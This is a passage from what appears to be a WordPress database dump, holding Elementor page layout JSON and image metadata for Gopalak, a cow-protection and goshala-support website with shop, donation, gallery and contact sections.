integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9823,1651,'_elementor_page_assets','a:0:{}'),(9825,1652,'_elementor_edit_mode','builder'),(9826,1652,'_elementor_template_type','wp-page'),(9827,1652,'_elementor_version','3.7.8'),(9828,1652,'_wp_page_template','elementor_canvas'),(9829,1652,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1579,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\"},{\"id\":1567,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\"},{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9830,1652,'_elementor_page_assets','a:0:{}'),(9846,1654,'_wp_attached_file','2022/10/values.png'),(9847,1654,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:5052;s:6:\"height\";i:1664;s:4:\"file\";s:18:\"2022/10/values.png\";s:8:\"filesize\";i:8257471;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"values-300x99.png\";s:5:\"width\";i:300;s:6:\"height\";i:99;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:50468;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"values-1024x337.png\";s:5:\"width\";i:1024;s:6:\"height\";i:337;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:425514;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"values-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29781;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"values-768x253.png\";s:5:\"width\";i:768;s:6:\"height\";i:253;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:258022;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"values-1536x506.png\";s:5:\"width\";i:1536;s:6:\"height\";i:506;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:883595;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:19:\"values-2048x675.png\";s:5:\"width\";i:2048;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1498085;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:18:\"values-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:102735;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:16:\"values-50x16.png\";s:5:\"width\";i:50;s:6:\"height\";i:16;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2103;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:18:\"values-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:15276;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:16:\"values-48x16.png\";s:5:\"width\";i:48;s:6:\"height\";i:16;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2051;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:16:\"values-48x16.png\";s:5:\"width\";i:48;s:6:\"height\";i:16;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2051;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9850,1655,'_elementor_edit_mode','builder'),(9851,1655,'_elementor_template_type','wp-page'),(9852,1655,'_elementor_version','3.7.8'),(9853,1655,'_wp_page_template','elementor_canvas'),(9854,1655,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About 